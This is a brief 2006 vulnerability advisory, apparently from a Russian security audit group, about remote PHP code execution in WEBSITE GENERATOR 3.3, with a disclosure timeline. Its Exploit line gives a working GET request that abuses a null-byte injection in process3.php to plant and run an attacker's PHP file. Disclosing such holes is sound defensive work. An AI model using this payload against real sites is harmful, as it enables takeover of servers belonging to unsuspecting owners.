Research: NSA Group [Russian company on Audit of safety & Network security]
Site of Research: http://www.nsag.ru or http://www.nsag.org
Product: WEBSITE GENERATOR 3.3
Site of manufacturer: http://freehostshop.com
The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is not notified (there is no communication). 17/02/2006 - Publication of vulnerability.
Original Advisory: http://www.nsag.ru/vuln/894.html
Description: The removed user, can upload php script from other server and execute custom php code on webserver.
Exploit: Method GET: http://example.com/files/myforms/process3.php?formname=attack.php%00*name= Link: http://example.com/files/myforms/forms/attack.php
More information: http://www.nsag.ru/vuln/894.html
www.nsag.ru «Nemesis» © 2006
Nemesis Security Audit Group © 2006.